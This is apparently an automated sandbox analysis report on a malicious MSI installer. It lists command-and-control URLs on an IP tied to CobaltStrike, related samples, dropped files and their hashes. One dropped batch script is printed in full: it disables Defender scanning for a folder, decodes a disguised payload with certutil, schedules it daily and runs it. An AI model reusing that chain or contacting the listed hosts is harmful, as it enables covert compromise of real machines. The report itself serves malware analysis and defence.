https://45.76.192.215:59611/load.215:59611/	WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/	WmiPrvSE.exe, 00000017.00000003.2487435512.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/sX(J	WmiPrvSE.exe, 00000017.00000003.2614937061.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2573167366.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744916674.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2703141614.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786728505.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2404088001.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro	powershell.exe, 0000000B.00000002.1538195254.0000000007BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1516318919.0000000003628000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://45.76.192.215:59611/load.215:59611/oad	WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/MFvJ&	WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/oad;F$J	WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/oad5F.J	WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/loadcs	WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.76.192.215	unknown	United States		20473	AS-CHOOPAUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1487470
Start date and time:	2024-08-04 10:48:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1eSOBjseu2.msi renamed because original name is a hash value
Original Sample Name:	29dd2916c20e18b713a8ecb72d3df632961e818cf35484ec6bafedc2ff415680.msi
Detection:	MAL
Classification:	mal100.troj.evad.winMSI@37/69@0/1
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 100% Number of executed functions: 109 Number of non-executed functions: 186
Cookbook Comments:	Found application associated with file extension: .msi Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 204.79.197.203, 95.101.149.131, 88.221.110.91, 2.16.100.168, 2.19.126.137, 2.19.126.163
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, a-0003.a-msedge.net, oneocsp-microsoft-com.a-0003.a-msedge.net, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, oneocsp.microsoft.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, download.windowsupdate.com.edgesuite.net, www.microsoft.com-c-3.edgekey.net, ocsp.digicert.com, wu-b-net.trafficmanager.net, www.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 1148 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8116 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:49:14	API Interceptor	208x Sleep call for process: powershell.exe modified
04:49:20	API Interceptor	13775741x Sleep call for process: WmiPrvSE.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.76.192.215	wj7vzBqUl9.exe	Get hash	malicious	CobaltStrike	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	3868LQ8lzf.exe	Get hash	malicious	PureLog Stealer	Browse	199.232.210.172
	https://dvmtp.r.ag.d.sendibm3.com/mk/un/sh/1t6AVsdYhqSR1o1yYHZUELgBUnazHr/j54QtPSXoIeR	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://transportationzhxztpro.top/i/	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://loker-pt-freeport-indonesia-2024.digitall-co.web.id/	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://mail.valeshia.50-6-170-168.cprapid.com/	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://freeusps.com/collections/all-usps-stamp/products/u-s-flag-2022-9683?data_from=collection_detail	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://freeusps.com/collections/2019/products/2017-disney-villains-100pcs?data_from=collection_detail	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://v1.bcit.pro/2131005010/Instagram.com.html	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://internal-checker.com/personal.html	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://internal-checker.com/	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	wj7vzBqUl9.exe	Get hash	malicious	CobaltStrike	Browse	45.76.192.215
	HhaL0xmHfu.elf	Get hash	malicious	Mirai	Browse	149.28.201.17
	https://myallsouth.com/privacy-policy/	Get hash	malicious	Unknown	Browse	207.148.0.16
	yycwWrUXJN.elf	Get hash	malicious	Mirai	Browse	44.40.175.55
	PBEZlc6yX7.elf	Get hash	malicious	Mirai	Browse	155.138.237.181
	E5r67vtBtc6.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
	Miner-XMR2.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
	DNQuHRCp7X.exe	Get hash	malicious	Blank Grabber, Xmrig	Browse	45.76.89.70
	sora.mips.elf	Get hash	malicious	Mirai	Browse	45.32.242.13
	https://neoventive.com.tr/Doc/	Get hash	malicious	Unknown	Browse	209.250.225.94

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\WmiPrvSE.exe	wj7vzBqUl9.exe	Get hash	malicious	CobaltStrike	Browse
C:\Windows\Installer\MSI3FB2.tmp	2024.0198840 298135.msi	Get hash	malicious	Unknown	Browse
	hForm.0198840 739798.msi	Get hash	malicious	Unknown	Browse
	ust_019821730-0576383.msi	Get hash	malicious	Unknown	Browse
	Br_i421i2-2481-125_754864.msi	Get hash	malicious	Unknown	Browse
	RAS_OL321231.msi	Get hash	malicious	Unknown	Browse
	file.msi	Get hash	malicious	Unknown	Browse
	file.msi	Get hash	malicious	Unknown	Browse
	file.msi	Get hash	malicious	Unknown	Browse
	NFE_098734_br.msi	Get hash	malicious	Unknown	Browse
	HCUVHNQCS1.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Config.Msi\643eaa.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	8428
Entropy (8bit):	5.542871958785147
Encrypted:	false
SSDEEP:	96:rrpm7wjevyXsi2BUCTCsThqZBUCTC6j83Z7nThqRHAPQ5CXXe5MXWVk1llWCMpl5:rrpmGeqX26COIm6COFTnov2DPMpL
MD5:	455E6ECA24270DB2D82950BDD521A5E9
SHA1:	1C913A96BF6AC067A79D5FA2999931DE3754F9E3
SHA-256:	BEC37E6DCBB93BBFF228226DA70801B16040D1E6EC6835354272F4E756CAB29A
SHA-512:	CF24599BEE7CC4BB35F032E5BC4240DD74F618BF05D8A95191416FD24C6B67E5397EAFB2D12930B3ACD1C16C4C9ABCFEA50B63E375C493D3621500B83E814456
Malicious:	false
Preview:	...@IXOS.@.....@&&.Y.@.....@.....@.....@.....@.....@......&.{88D74BC3-DFDB-412A-9165-9910293F91BC}..WmiPrvSE..1eSOBjseu2.msi.@.....@.....@.....@........&.{9AD54326-34E0-4D44-AFB7-7A7E831CAF55}.....@.....@.....@.....@.......@.....@.....@.......@......WmiPrvSE......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{4CDF882A-AA01-456F-A2EA-94ABE42E2C47}&.{88D74BC3-DFDB-412A-9165-9910293F91BC}.@......&.{B4630925-A1BD-4A8D-9FE5-108126E4BB94}&.{88D74BC3-DFDB-412A-9165-9910293F91BC}.@......&.{9C0BC1EA-30AD-4B69-AFF6-894FE3DFA0B2}&.{88D74BC3-DFDB-412A-9165-9910293F91BC}.@........CreateFolders..Creating folders..Folder: [1]#.).C:\Program Files (x86)\WmiPrvSE\WmiPrvSE\.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@....X.Software\Caphyon\Advanced Installer\Prereqs\{88D74BC3-DFDB-412A-9165-9910293F91BC}\1.0.0...@....(.&...Desktop..1$..@......Software\WmiPrvS

C:\Config.Msi\643eac.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	387
Entropy (8bit):	5.0003394709815705
Encrypted:	false
SSDEEP:	6:Ea3LMne/YeduuwVMWNKQ2lE4Qsgmll/JwsuRkYRsj9Yq:EgyOBdudpNK9JQsj//Sft2/
MD5:	28C9D7F0D29F1CCA264F4F6B87862C21
SHA1:	D5C36F1EBEE16D461B69A2C299905DB0A62C89FE
SHA-256:	234E147B0C9F15E6B3A5E499E1821BFDE5E964DDE1A5EF0EE7CB0CB5212D24BA
SHA-512:	5684DA03744E096D5445F916CD255FF38DCD5ED4CBD9450C3E64D71DF005E491E98621CB29A430F27035F4BBD472C00ADD15A516AD658D299938FBB670889757
Malicious:	false
Preview:	...@IXOS.@.....@&&.Y.@.....@.....@.....@.....@.....@......&.{88D74BC3-DFDB-412A-9165-9910293F91BC}..WmiPrvSE..1eSOBjseu2.msi.@.....@.....@.....@........&.{9AD54326-34E0-4D44-AFB7-7A7E831CAF55}.....@.....@.....@.....@.......@.....@.....@.......@......WmiPrvSE......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....AI_LaunchChainer...@.....@.....@....

C:\Users\Public\NDTCN1.dat

Download File

Process:	C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe
File Type:	PEM certificate
Category:	dropped
Size (bytes):	452024
Entropy (8bit):	5.964354272730181
Encrypted:	false
SSDEEP:	6144:Tjf0HLIBA25QRA+EzBpajKm/1J04Ug4ZHnb1ByEJ1EoWt:Tjf0rOAkXB8um/1G3gOHb1BySEoI
MD5:	B183EB98A872FBA5091122FF3F84B025
SHA1:	6E3EF383306687A08B81A6528DB63E206DF6B7C2
SHA-256:	628DF0A54E9A5A18BBABDB2F33333E5F12898028132757A24A1EE5C6FD63FF67
SHA-512:	C19A32B01F9684627A9EDE7E1DB2AAD1B40D5B80CC74BD8CD47BB4BC4F46C8AC98676ADBD3C8E2EA140B504AE257DB893DCB2EA498F14B90D051C8BF9D5B05ED
Malicious:	false
Preview:	-----BEGIN CERTIFICATE-----..TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v..dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYJAAAAAAAAAAAA..AAAAAPAALwILAgIiACIAAAAABQAACgAAwBQAAAAQAAAAAEAAAAAAAAAQAAAAAgAA..BAAAAAAAAAAFAAIAAAAAAABwBQAABAAABwYFAAIAAAAAACAAAAAAAAAQAAAAAAAA..AAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAQAUA2AgAAAAAAAAAAAAA..ABAFALgCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..YAAFACgAAAAAAAAAAAAAAAAAAAAAAAAAJEIFAOgBAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAudGV4dAAAAKggAAAAEAAAACIAAAAEAAAAAAAAAAAAAAAAAABgAFBg..LmRhdGEAAADwvAQAAEAAAAC+BAAAJgAAAAAAAAAAAAAAAAAAQABgwC5yZGF0YQAA..EAkAAAAABQAACgAAAOQEAAAAAAAAAAAAAAAAAEAAYEAucGRhdGEAALgCAAAAEAUA..AAQAAADuBAAAAAAAAAAAAAAAAABAADBALnhkYXRhAAA4AgAAACAFAAAEAAAA8gQA..AAAAAAAAAAAAAAAAQAAwQC5ic3MAAAAA0AkAAAAwBQAAAAAAAAAAAAAAAAAAAAAA..AAAAAIAAYMAuaWRhdGEAANgIAAAAQAUAAAoAAAD2BAAAAAAAAAAAAAAAAABAADDA..LkNSVAAAAABoAAAAAFAFAAACAAAAAAUAAAAAAAAAAAAAAAA

C:\Users\Public\WmiPrvSE.bat

Download File

Process:	C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	396
Entropy (8bit):	5.1449661450238695
Encrypted:	false
SSDEEP:	6:s8GAeGgdEY1AuaHJO98GAeGgdEWRyYAuaHsNkjxIaH3ncENaHsIb5ksycMaHsEKs:s8OuVI98OuVl74be6Kdh4
MD5:	F1944530E0E4C27AC00560AF1F92249B
SHA1:	C24F124EC1F696A7D41492C9C471DA95E7BF9D74
SHA-256:	361DB3755D1CE2DB5FF0C28CEC3C5481CBE2ECAC0A45CC6617721DC375A4C7C7
SHA-512:	07B7F9AEB8D9E6C6419CD1C4F501B8E1B91AE1D2895003042F2ED48FBB47CFDE2BE84FB1DEC1573621EDD433904327F5CAD9021581FF79680A6D487A2714053D
Malicious:	true
Preview:	powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'"..powershell -command "Add-MpPreference -ExclusionExtension 'C:\Users\Public\WmiPrvSE.exe'"..certutil -decode C:\Users\Public\NDTCN1.dat C:\Users\Public\WmiPrvSE.exe..SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f..start C:\Users\Public\WmiPrvSE.exe..del C:\Users\Public\WmiPrvSE.bat

C:\Users\Public\WmiPrvSE.exe

Download File

Process:	C:\Windows\System32\certutil.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	328704
Entropy (8bit):	7.320317256363974
Encrypted:	false
SSDEEP:	6144:gbDlaRBELE5d3qnyoXPzceVMhtO6sveBnG+2pB0Qh9:gbD8BFgymPLMhU6s7p
MD5:	29FA5E4FD104FD12A870D2DD90E42B31
SHA1:	C027A673909EB95A74B7AE364FC52797C683EE3C
SHA-256:	298EADA4723177FAC953AFC963A4BFFA56D7DBBA3D1BEA340E53953E736BCA80
SHA-512:	5D956128F2CEE43EFF2ADB85E08F288721C3A244A7DEF649C05171E9A54D656880A55FDB4B8336DF08BBD007246C4BA3DAEDF309159093C16E486C6F490DA880
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Joe Sandbox View:	Filename: wj7vzBqUl9.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."....................@..............................p................ ..............................................@..............................................................`...(...................$B...............................text.... ......."..................`.P`.data.......@.......&..............@.`..rdata..............................@.`@.pdata..............................@.0@.xdata..8.... ......................@.0@.bss.........0........................`..idata.......@......................@.0..CRT....h....P......................@.@..tls.........`......................@.@.........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	5.440603014622264
Encrypted:	false
SSDEEP:	24:3iT0cYRSKco4KmZjKbmOIKod6emN1s4RPQoU99tJBJt/NK3R8IHia/U:y4xRSU4xympjms4RIoU99tJBLNWR8IHy
MD5:	282631418ED954F70A649FC883F6F8D5
SHA1:	0608B7EA269CCC8CEBBDDB4FDC3E168C5F343333
SHA-256:	8C6D7C4C8CD0B67B6079A0FB1032055275119FBE7839E49E0275E0B06F702F2B
SHA-512:	B7D4D3C7B91EC2DFFBCFFB625AC2B8901853B1742F24F809E81ED9FF0BF060ECAC6076FD4FB999031DA38A0FE3FDA81B067C4ED8792482B1CFEACD6C3AB2C287
Malicious:	false
Preview:	@...e.................................R..............@..........L...............h..t...D.d.u.........!.Microsoft.PowerShell.ScheduledJob...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Command

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zihtbja.0sf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gd1t0ou.o1c.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5nzahhr5.qw3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbluiyvv.gx4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_defviejg.5i1.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eifk2zsw.guu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghdg5llc.v2w.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pvxwxjqp.fah.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
